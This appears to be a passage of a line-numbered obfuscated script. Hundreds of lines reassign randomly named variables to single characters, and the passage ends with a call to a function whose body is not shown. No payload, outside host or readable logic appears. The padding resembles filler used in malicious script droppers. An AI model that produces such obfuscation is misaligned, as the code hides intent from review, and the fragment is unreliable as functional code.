813 | sqjapz = "z"; | |
814 | sqjapz = "B"; | |
815 | sqjapz = "h"; | |
816 | sqjapz = "X"; | |
817 | sqjapz = "u"; | |
818 | sqjapz = "V"; | |
819 | sqjapz = "I"; | |
820 | sqjapz = "a"; | |
821 | sqjapz = "c"; | |
822 | sqjapz = "w"; | |
823 | sqjapz = "A"; | |
824 | sqjapz = "X"; | |
825 | sqjapz = "E"; | |
826 | sqjapz = "Q"; | |
827 | sqjapz = "D"; | |
828 | sqjapz = "x"; | |
829 | sqjapz = "E"; | |
830 | sqjapz = "p"; | |
831 | sqjapz = "\""; | |
832 | jmgpcdflz = "D"; | |
833 | jmgpcdflz = "S"; | |
834 | jmgpcdflz = "l"; | |
835 | jmgpcdflz = "t"; | |
836 | jmgpcdflz = "V"; | |
837 | jmgpcdflz = "x"; | |
838 | jmgpcdflz = "S"; | |
839 | jmgpcdflz = "k"; | |
840 | jmgpcdflz = "I"; | |
841 | jmgpcdflz = "E"; | |
842 | jmgpcdflz = "K"; | |
843 | jmgpcdflz = "T"; | |
844 | jmgpcdflz = "m"; | |
845 | jmgpcdflz = "f"; | |
846 | jmgpcdflz = "p"; | |
847 | jmgpcdflz = "t"; | |
848 | jmgpcdflz = "G"; | |
849 | jmgpcdflz = "D"; | |
850 | jmgpcdflz = "g"; | |
851 | jmgpcdflz = "n"; | |
852 | jmgpcdflz = "S"; | |
853 | jmgpcdflz = "g"; | |
854 | jmgpcdflz = "X"; | |
855 | jmgpcdflz = "X"; | |
856 | jmgpcdflz = "p"; | |
857 | jmgpcdflz = "R"; | |
858 | jmgpcdflz = "g"; | |
859 | jmgpcdflz = "p"; | |
860 | jmgpcdflz = "U"; | |
861 | jmgpcdflz = "i"; | |
862 | jmgpcdflz = "v"; | |
863 | jmgpcdflz = "G"; | |
864 | jmgpcdflz = "U"; | |
865 | jmgpcdflz = "A"; | |
866 | jmgpcdflz = "o"; | |
867 | jmgpcdflz = "i"; | |
868 | jmgpcdflz = "q"; | |
869 | jmgpcdflz = "Q"; | |
870 | jmgpcdflz = "b"; | |
871 | jmgpcdflz = "r"; | |
872 | jmgpcdflz = "I"; | |
873 | harprzo = "C"; | |
874 | lpnqxv = "R"; | |
875 | lpnqxv = "N"; | |
876 | lpnqxv = "s"; | |
877 | lpnqxv = "d"; | |
878 | zqzmgmcm = "z"; | |
879 | zqzmgmcm = "M"; | |
880 | zqzmgmcm = "I"; | |
881 | zqzmgmcm = "P"; | |
882 | zqzmgmcm = "V"; | |
883 | zqzmgmcm = "j"; | |
884 | zqzmgmcm = "T"; | |
885 | zqzmgmcm = "R"; | |
886 | zqzmgmcm = "e"; | |
887 | zqzmgmcm = "r"; | |
888 | zqzmgmcm = "E"; | |
889 | zqzmgmcm = "B"; | |
890 | zqzmgmcm = "i"; | |
891 | zqzmgmcm = "H"; | |
892 | zqzmgmcm = "R"; | |
893 | zqzmgmcm = "i"; | |
894 | zqzmgmcm = "y"; | |
895 | zqzmgmcm = "t"; | |
896 | zqzmgmcm = "c"; | |
897 | zqzmgmcm = "Z"; | |
898 | zqzmgmcm = "X"; | |
899 | zqzmgmcm = "k"; | |
900 | zqzmgmcm = "s"; | |
901 | zqzmgmcm = "4"; | |
902 | rjustrn = "B"; | |
903 | rjustrn = "U"; | |
904 | rjustrn = "Y"; | |
905 | rjustrn = "L"; | |
906 | rjustrn = "T"; | |
907 | rjustrn = "Y"; | |
908 | rjustrn = "i"; | |
909 | rjustrn = "W"; | |
910 | rjustrn = "p"; | |
911 | rjustrn = "h"; | |
912 | rjustrn = "w"; | |
913 | ivkjmrpq = "W"; | |
914 | ivkjmrpq = "u"; | |
915 | ivkjmrpq = "H"; | |
916 | ivkjmrpq = "i"; | |
917 | ivkjmrpq = "Z"; | |
918 | ivkjmrpq = "Y"; | |
919 | ivkjmrpq = "P"; | |
920 | ivkjmrpq = "J"; | |
921 | ivkjmrpq = "t"; | |
922 | ivkjmrpq = "C"; | |
923 | ivkjmrpq = "q"; | |
924 | ivkjmrpq = "T"; | |
925 | ivkjmrpq = "S"; | |
926 | ivkjmrpq = "r"; | |
927 | ivkjmrpq = "R"; | |
928 | ivkjmrpq = "k"; | |
929 | ivkjmrpq = "M"; | |
930 | ivkjmrpq = "f"; | |
931 | ivkjmrpq = "X"; | |
932 | ivkjmrpq = "B"; | |
933 | ivkjmrpq = "X"; | |
934 | ivkjmrpq = "C"; | |
935 | ivkjmrpq = "X"; | |
936 | ivkjmrpq = "c"; | |
937 | ivkjmrpq = "w"; | |
938 | ivkjmrpq = "R"; | |
939 | ivkjmrpq = "A"; | |
940 | ivkjmrpq = "z"; | |
941 | ivkjmrpq = "u"; | |
942 | ubftmhtqn = "Q"; | |
943 | ubftmhtqn = "C"; | |
944 | ubftmhtqn = "j"; | |
945 | ubftmhtqn = "v"; | |
946 | ubftmhtqn = "a"; | |
947 | ubftmhtqn = "b"; | |
948 | ubftmhtqn = "y"; | |
949 | ubftmhtqn = "z"; | |
950 | ubftmhtqn = "m"; | |
951 | ubftmhtqn = "f"; | |
952 | ubftmhtqn = "o"; | |
953 | ubftmhtqn = "E"; | |
954 | ubftmhtqn = "b"; | |
955 | ubftmhtqn = "A"; | |
956 | ubftmhtqn = "B"; | |
957 | ubftmhtqn = "V"; | |
958 | ubftmhtqn = "J"; | |
959 | ubftmhtqn = "A"; | |
960 | ubftmhtqn = "a"; | |
961 | zeknadh = "z"; | |
962 | zeknadh = "p"; | |
963 | zeknadh = "t"; | |
964 | zeknadh = "c"; | |
965 | zeknadh = "Q"; | |
966 | zeknadh = "W"; | |
967 | zeknadh = "P"; | |
968 | zeknadh = "R"; | |
969 | zeknadh = "Y"; | |
970 | zeknadh = "h"; | |
971 | zeknadh = "c"; | |
972 | zeknadh = "H"; | |
973 | zeknadh = "I"; | |
974 | zeknadh = "C"; | |
975 | zeknadh = "v"; | |
976 | zeknadh = "D"; | |
977 | zeknadh = "j"; | |
978 | zeknadh = "V"; | |
979 | zeknadh = "w"; | |
980 | zeknadh = "A"; | |
981 | zeknadh = "J"; | |
982 | zeknadh = "f"; | |
983 | zeknadh = "L"; | |
984 | zeknadh = "k"; | |
985 | zeknadh = "j"; | |
986 | zeknadh = "8"; | |
987 | ehnfc = "A"; | |
988 | ehnfc = "c"; | |
989 | ehnfc = " "; | |
990 | ikvwmyzo = "M"; | |
991 | ikvwmyzo = "T"; | |
992 | ikvwmyzo = "T"; | |
993 | ikvwmyzo = "w"; | |
994 | ikvwmyzo = "P"; | |
995 | ikvwmyzo = "p"; | |
996 | ikvwmyzo = "k"; | |
997 | ikvwmyzo = "P"; | |
998 | ikvwmyzo = "A"; | |
999 | ikvwmyzo = "P"; | |
1000 | ikvwmyzo = "Y"; | |
1001 | ikvwmyzo = "u"; | |
1002 | ikvwmyzo = "a"; | |
1003 | ikvwmyzo = "e"; | |
1004 | ikvwmyzo = "N"; | |
1005 | ikvwmyzo = "j"; | |
1006 | ikvwmyzo = "L"; | |
1007 | ikvwmyzo = "S"; | |
1008 | ikvwmyzo = "z"; | |
1009 | ikvwmyzo = "p"; | |
1010 | ikvwmyzo = "b"; | |
1011 | ikvwmyzo = "v"; | |
1012 | ikvwmyzo = "L"; | |
1013 | jlhxcah = "z"; | |
1014 | jlhxcah = "r"; | |
1015 | jlhxcah = "H"; | |
1016 | nujhsgjtt = "b"; | |
1017 | nujhsgjtt = "u"; | |
1018 | nujhsgjtt = "v"; | |
1019 | nujhsgjtt = "R"; | |
1020 | qdjnproo = "r"; | |
1021 | qdjnproo = "T"; | |
1022 | qdjnproo = "H"; | |
1023 | qdjnproo = "v"; | |
1024 | qdjnproo = "w"; | |
1025 | qdjnproo = "q"; | |
1026 | qdjnproo = "a"; | |
1027 | qdjnproo = "Z"; | |
1028 | qdjnproo = "Y"; | |
1029 | qdjnproo = "s"; | |
1030 | qdjnproo = "i"; | |
1031 | qdjnproo = "g"; | |
1032 | qdjnproo = "o"; | |
1033 | qdjnproo = "b"; | |
1034 | qdjnproo = "y"; | |
1035 | qdjnproo = "e"; | |
1036 | qdjnproo = "I"; | |
1037 | qdjnproo = "d"; | |
1038 | qdjnproo = "K"; | |
1039 | qdjnproo = "m"; | |
1040 | qdjnproo = "C"; | |
1041 | qdjnproo = "l"; | |
1042 | qdjnproo = "k"; | |
1043 | qdjnproo = "J"; | |
1044 | qdjnproo = "i"; | |
1045 | qdjnproo = "l"; | |
1046 | qdjnproo = "o"; | |
1047 | qdjnproo = "&"; | |
1048 | jjksw = "f"; | |
1049 | jjksw = "u"; | |
1050 | jjksw = "y"; | |
1051 | jjksw = "U"; | |
1052 | jjksw = "h"; | |
1053 | jjksw = "O"; | |
1054 | jjksw = "k"; | |
1055 | jjksw = "l"; | |
1056 | jjksw = "J"; | |
1057 | jjksw = "C"; | |
1058 | jjksw = "K"; | |
1059 | jjksw = "R"; | |
1060 | jjksw = "v"; | |
1061 | jjksw = "D"; | |
1062 | jjksw = "v"; | |
1063 | jjksw = "C"; | |
1064 | jjksw = "p"; | |
1065 | jjksw = "b"; | |
1066 | jjksw = "W"; | |
1067 | jjksw = "k"; | |
1068 | jjksw = "n"; | |
1069 | jjksw = "H"; | |
1070 | jjksw = "K"; | |
1071 | jjksw = "m"; | |
1072 | jjksw = "Y"; | |
1073 | jjksw = "g"; | |
1074 | jjksw = "k"; | |
1075 | jjksw = "O"; | |
1076 | jjksw = "r"; | |
1077 | jjksw = "l"; | |
1078 | jjksw = "o"; | |
1079 | jjksw = "r"; | |
1080 | ewjvsdgtn = "W"; | |
1081 | ewjvsdgtn = "Z"; | |
1082 | ewjvsdgtn = "K"; | |
1083 | ewjvsdgtn = "N"; | |
1084 | ewjvsdgtn = "M"; | |
1085 | ewjvsdgtn = "i"; | |
1086 | ewjvsdgtn = "C"; | |
1087 | ewjvsdgtn = "V"; | |
1088 | ewjvsdgtn = "f"; | |
1089 | ewjvsdgtn = "P"; | |
1090 | ewjvsdgtn = "Y"; | |
1091 | ewjvsdgtn = "B"; | |
1092 | ewjvsdgtn = "a"; | |
1093 | ewjvsdgtn = "U"; | |
1094 | ewjvsdgtn = "T"; | |
1095 | ewjvsdgtn = "Z"; | |
1096 | ewjvsdgtn = "i"; | |
1097 | ewjvsdgtn = "K"; | |
1098 | ewjvsdgtn = "C"; | |
1099 | ewjvsdgtn = "G"; | |
1100 | ewjvsdgtn = "D"; | |
1101 | ewjvsdgtn = "F"; | |
1102 | ewjvsdgtn = "T"; | |
1103 | ewjvsdgtn = "c"; | |
1104 | ewjvsdgtn = "N"; | |
1105 | ewjvsdgtn = "h"; | |
1106 | ewjvsdgtn = "H"; | |
1107 | ewjvsdgtn = "p"; | |
1108 | ewjvsdgtn = "u"; | |
1109 | ewjvsdgtn = "D"; | |
1110 | ewjvsdgtn = "v"; | |
1111 | ewjvsdgtn = "O"; | |
1112 | ewjvsdgtn = "J"; | |
1113 | ewjvsdgtn = "g"; | |
1114 | ewjvsdgtn = "\\"; | |
1115 | ewpywdib = "R"; | |
1116 | ewpywdib = "j"; | |
1117 | ewpywdib = "N"; | |
1118 | ewpywdib = "O"; | |
1119 | ewpywdib = "g"; | |
1120 | ewpywdib = "g"; | |
1121 | ewpywdib = "3"; | |
1122 | vzbiskfes = "j"; | |
1123 | vzbiskfes = "b"; | |
1124 | vzbiskfes = "v"; | |
1125 | vzbiskfes = "f"; | |
1126 | vzbiskfes = "T"; | |
1127 | ofqqcthec = "a"; | |
1128 | ofqqcthec = "Y"; | |
1129 | ofqqcthec = "e"; | |
1130 | udfok = "p"; | |
1131 | udfok = "g"; | |
1132 | udfok = "k"; | |
1133 | udfok = "z"; | |
1134 | udfok = "G"; | |
1135 | udfok = "d"; | |
1136 | udfok = "g"; | |
1137 | udfok = "Y"; | |
1138 | udfok = "e"; | |
1139 | udfok = "W"; | |
1140 | udfok = "k"; | |
1141 | uzyfcgq = "m"; | |
1142 | uzyfcgq = "K"; | |
1143 | uzyfcgq = "0"; | |
1144 | chkldhx = "R"; | |
1145 | chkldhx = "r"; | |
1146 | chkldhx = "w"; | |
1147 | chkldhx = "G"; | |
1148 | chkldhx = "N"; | |
1149 | chkldhx = "o"; | |
1150 | chkldhx = "V"; | |
1151 | chkldhx = "s"; | |
1152 | chkldhx = "p"; | |
1153 | chkldhx = "V"; | |
1154 | chkldhx = "T"; | |
1155 | chkldhx = "p"; | |
1156 | chkldhx = "Z"; | |
1157 | chkldhx = "D"; | |
1158 | chkldhx = "p"; | |
1159 | chkldhx = "K"; | |
1160 | chkldhx = "U"; | |
1161 | chkldhx = "p"; | |
1162 | chkldhx = "Y"; | |
1163 | chkldhx = "g"; | |
1164 | chkldhx = "Q"; | |
1165 | chkldhx = "I"; | |
1166 | chkldhx = "U"; | |
1167 | chkldhx = "y"; | |
1168 | chkldhx = "M"; | |
1169 | chkldhx = "l"; | |
1170 | chkldhx = "n"; | |
1171 | chkldhx = "E"; | |
1172 | chkldhx = "x"; | |
1173 | chkldhx = "K"; | |
1174 | chkldhx = "n"; | |
1175 | chkldhx = "P"; | |
1176 | chkldhx = "f"; | |
1177 | chkldhx = "c"; | |
1178 | chkldhx = "I"; | |
1179 | chkldhx = "u"; | |
1180 | chkldhx = "m"; | |
1181 | chkldhx = "s"; | |
1182 | chkldhx = "5"; | |
1183 | tkyocmrt = "W"; | |
1184 | rvvscwnvr = "o"; | |
1185 | rvvscwnvr = "R"; | |
1186 | rvvscwnvr = "L"; | |
1187 | rvvscwnvr = "U"; | |
1188 | rvvscwnvr = "L"; | |
1189 | rvvscwnvr = "O"; | |
1190 | rvvscwnvr = "X"; | |
1191 | rvvscwnvr = "d"; | |
1192 | rvvscwnvr = "H"; | |
1193 | rvvscwnvr = "l"; | |
1194 | rvvscwnvr = "g"; | |
1195 | rvvscwnvr = "o"; | |
1196 | rvvscwnvr = "S"; | |
1197 | rvvscwnvr = "W"; | |
1198 | rvvscwnvr = "H"; | |
1199 | rvvscwnvr = "J"; | |
1200 | rvvscwnvr = "f"; | |
1201 | rvvscwnvr = "t"; | |
1202 | rvvscwnvr = "Y"; | |
1203 | rvvscwnvr = "L"; | |
1204 | rvvscwnvr = "t"; | |
1205 | rvvscwnvr = "J"; | |
1206 | rvvscwnvr = "c"; | |
1207 | rvvscwnvr = "G"; | |
1208 | rvvscwnvr = "l"; | |
1209 | rvvscwnvr = "j"; | |
1210 | rvvscwnvr = "c"; | |
1211 | rvvscwnvr = "V"; | |
1212 | rvvscwnvr = "q"; | |
1213 | rvvscwnvr = "I"; | |
1214 | rvvscwnvr = "M"; | |
1215 | rvvscwnvr = "x"; | |
1216 | rvvscwnvr = "c"; | |
1217 | rvvscwnvr = "x"; | |
1218 | rvvscwnvr = "T"; | |
1219 | rvvscwnvr = "d"; | |
1220 | rvvscwnvr = "L"; | |
1221 | rvvscwnvr = "B"; | |
1222 | rvvscwnvr = "L"; | |
1223 | rvvscwnvr = "t"; | |
1224 | rvvscwnvr = "H"; | |
1225 | rvvscwnvr = "_"; | |
1226 | zpkcv = "h"; | |
1227 | zpkcv = "e"; | |
1228 | zpkcv = "X"; | |
1229 | zpkcv = "W"; | |
1230 | zpkcv = "o"; | |
1231 | zpkcv = "j"; | |
1232 | zpkcv = "n"; | |
1233 | zpkcv = "C"; | |
1234 | zpkcv = "z"; | |
1235 | zpkcv = "o"; | |
1236 | zpkcv = "u"; | |
1237 | zpkcv = "S"; | |
1238 | zpkcv = "y"; | |
1239 | zpkcv = "k"; | |
1240 | zpkcv = "Z"; | |
1241 | zpkcv = "v"; | |
1242 | zpkcv = "x"; | |
1243 | zpkcv = "Z"; | |
1244 | zpkcv = "B"; | |
1245 | zpkcv = "b"; | |
1246 | zpkcv = "M"; | |
1247 | zpkcv = "A"; | |
1248 | zpkcv = "L"; | |
1249 | zpkcv = "d"; | |
1250 | zpkcv = "O"; | |
1251 | zpkcv = "c"; | |
1252 | zpkcv = "O"; | |
1253 | zpkcv = "J"; | |
1254 | zpkcv = "v"; | |
1255 | zpkcv = "T"; | |
1256 | zpkcv = "f"; | |
1257 | zpkcv = "U"; | |
1258 | zpkcv = "t"; | |
1259 | zpkcv = "S"; | |
1260 | zpkcv = "r"; | |
1261 | zpkcv = "U"; | |
1262 | zpkcv = "o"; | |
1263 | qffob = "q"; | |
1264 | qffob = "q"; | |
1265 | qffob = "T"; | |
1266 | qffob = "c"; | |
1267 | qffob = "J"; | |
1268 | qffob = "H"; | |
1269 | qffob = "Z"; | |
1270 | qffob = "m"; | |
1271 | qffob = "L"; | |
1272 | qffob = "Q"; | |
1273 | qffob = "Q"; | |
1274 | qffob = "m"; | |
1275 | qffob = "c"; | |
1276 | qffob = "h"; | |
1277 | qffob = "t"; | |
1278 | qffob = "k"; | |
1279 | qffob = "S"; | |
1280 | qffob = "c"; | |
1281 | lpvaj ( ); |
|